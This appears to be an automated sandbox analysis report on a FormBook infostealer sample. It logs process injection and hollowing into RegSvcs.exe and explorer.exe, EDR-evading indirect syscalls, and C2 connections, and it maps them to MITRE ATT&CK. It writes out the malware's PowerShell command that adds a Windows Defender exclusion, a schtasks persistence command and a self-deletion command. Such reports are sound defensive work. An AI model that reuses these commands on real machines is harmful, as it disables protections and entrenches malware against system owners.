Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01174F03 mov eax, dword ptr fs:[00000030h]	7_2_01174F03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115EF28 mov eax, dword ptr fs:[00000030h]	7_2_0115EF28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h]	7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h]	7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h]	7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h]	7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h]	7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h]	7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CF50 mov eax, dword ptr fs:[00000030h]	7_2_0116CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h]	7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h]	7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h]	7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h]	7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h]	7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h]	7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h]	7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AF42 mov eax, dword ptr fs:[00000030h]	7_2_0113AF42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AF42 mov eax, dword ptr fs:[00000030h]	7_2_0113AF42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AF42 mov eax, dword ptr fs:[00000030h]	7_2_0113AF42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h]	7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h]	7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h]	7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h]	7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h]	7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h]	7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h]	7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4F40 mov eax, dword ptr fs:[00000030h]	7_2_011B4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4F40 mov eax, dword ptr fs:[00000030h]	7_2_011B4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4F40 mov eax, dword ptr fs:[00000030h]	7_2_011B4F40

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_00722E62 GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

15_2_00722E62

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00726510 SetUnhandledExceptionFilter,		15_2_00726510
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_007261C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		15_2_007261C0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 157.53.227.1 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.134.182 80			Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe"			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	NtQueueApcThread: Indirect: 0xFEA4F2	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	NtClose: Indirect: 0x111A56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	NtQueueApcThread: Indirect: 0x111A4F2	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	NtClose: Indirect: 0xFEA56C

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 4004	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 4004	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread register set: target process: 4004	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 720000			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 720000			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 997008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A08008	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp9563.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: explorer.exe, 00000009.00000002.4571895416.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2140613728.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: explorer.exe, 00000009.00000002.4571895416.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2140613728.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.4574433830.00000000048E0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000002.4571895416.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2140613728.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000009.00000002.4570236364.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2139208430.0000000000D69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +Progman
Source: explorer.exe, 00000009.00000002.4571895416.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2140613728.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000009.00000000.2154297535.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075211732.00000000098E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979149239.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd31A

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Queries volume information: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_00726735 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

15_2_00726735

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	812 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	241 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	41 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	812 Process Injection	NTDS	41 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
